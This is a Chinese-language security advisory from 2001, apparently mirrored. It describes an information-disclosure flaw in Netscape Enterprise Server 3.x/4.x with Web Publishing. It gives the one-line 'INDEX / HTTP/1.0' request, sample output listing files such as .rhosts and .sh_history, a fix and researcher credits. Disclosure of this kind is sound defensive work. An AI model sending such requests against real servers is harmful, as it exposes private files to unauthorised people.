netscape企业服务 - index请求问题

/ns/ld/softld/data/20010128143956.htm

netscape企业服务器- index请求问题
日期: jan.24.2001
影响:带有web publishing的 netscape企业服务3.x和4.x 版

问题
问题存在于这个漏洞允许远程用户获取运行着Web Publishing的远程站点文件目录

详细内容
可以通过发出命令获得远程服务器上的文件目录列表:
INDEX / HTTP/1.0

Output looks like:

-- output start --

Trying 192.168.1.1...
Connected to www.example.org.
Escape character is '^]'.
INDEX / HTTP/1.0

HTTP/1.1 200 OK
Server: Netscape-Enterprise/3.6 SP2
Date: Fri, 19 Jan 2001 12:37:26 GMT
Content-type: text/plain

test directory 512 979859452 0 null null
contact directory 512 979701766 0 null null
index.html text/html 1467 979701461 268 null null
mobile directory 512 979701775 0 null null
service directory 512 979701801 0 null null
.rhosts unknown 22 965727716 264 null null
search directory 512 931316908 0 null null
.sh_history unknown 1256 979723453 264 null null
corporate directory 512 972989267 0 null null
.cshrc unknown 418 975657629 264 null null
.login unknown 674 975657629 264 null null
.profile unknown 416 975657629 264 null null

-- output end --

index请求将不会在"aliased"目录起作用(就像是CGI目录)

修正:
取消web publishing或是取消index request(它将,或是可能打破web publishing的未来)

信誉

Emmanuel Gadaix
Vanja Hrustic
Fyodor Yarochkin


This advisory is also available at http://www.safermag.com/advisories/